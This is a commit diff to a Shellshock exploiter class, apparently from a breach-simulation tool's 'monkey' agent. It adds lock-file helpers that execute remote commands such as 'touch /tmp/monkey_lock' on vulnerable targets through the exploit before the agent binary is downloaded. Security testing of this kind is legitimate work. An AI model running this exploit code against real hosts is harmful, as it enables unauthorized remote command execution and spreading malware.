enter lock before downloading

This commit is contained in:
Anh T Nguyen 2019-08-29 18:18:41 +07:00
parent cc5795d99c
commit 8099644cee
1 changed files with 30 additions and 0 deletions

View File

@ -108,6 +108,9 @@ class ShellShockExploiter(HostExploiter):
LOG.info("Can't find suitable monkey executable for host %r", self.host) LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False return False
if not self._try_lock(exploit, url, header):
continue
http_path, http_thread = HTTPTools.create_transfer(self.host, src_path) http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
if not http_path: if not http_path:
@ -124,6 +127,8 @@ class ShellShockExploiter(HostExploiter):
http_thread.join(DOWNLOAD_TIMEOUT) http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop() http_thread.stop()
self._exit_lock(exploit, url, header)
if (http_thread.downloads != 1) or ( if (http_thread.downloads != 1) or (
'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): 'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
@ -182,6 +187,31 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("URL %s does not seem to be vulnerable with %s header" % (url, header)) LOG.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
return False, return False,
@classmethod
def _try_lock(cls, exploit, url, header):
"""
Checks if another monkey is running shellshock exploit
:return: True if no monkey is running shellshock exploit
"""
file_path = '/tmp/monkey_lock'
if cls.check_remote_file_exists(url, header, exploit, file_path):
LOG.info("Another monkey is running shellshock exploit")
return False
cmdline = 'touch /tmp/monkey_lock'
run_path = exploit + cmdline
cls.attack_page(url, header, run_path)
return True
@classmethod
def _exit_lock(cls, exploit, url, header):
"""
Remove lock file from target machine
"""
file_path = '/tmp/monkey_lock'
cmdline = 'rm %s' % file_path
run_path = exploit + cmdline
cls.attack_page(url, header, run_path)
@staticmethod @staticmethod
def attack_page(url, header, attack): def attack_page(url, header, attack):
result = "" result = ""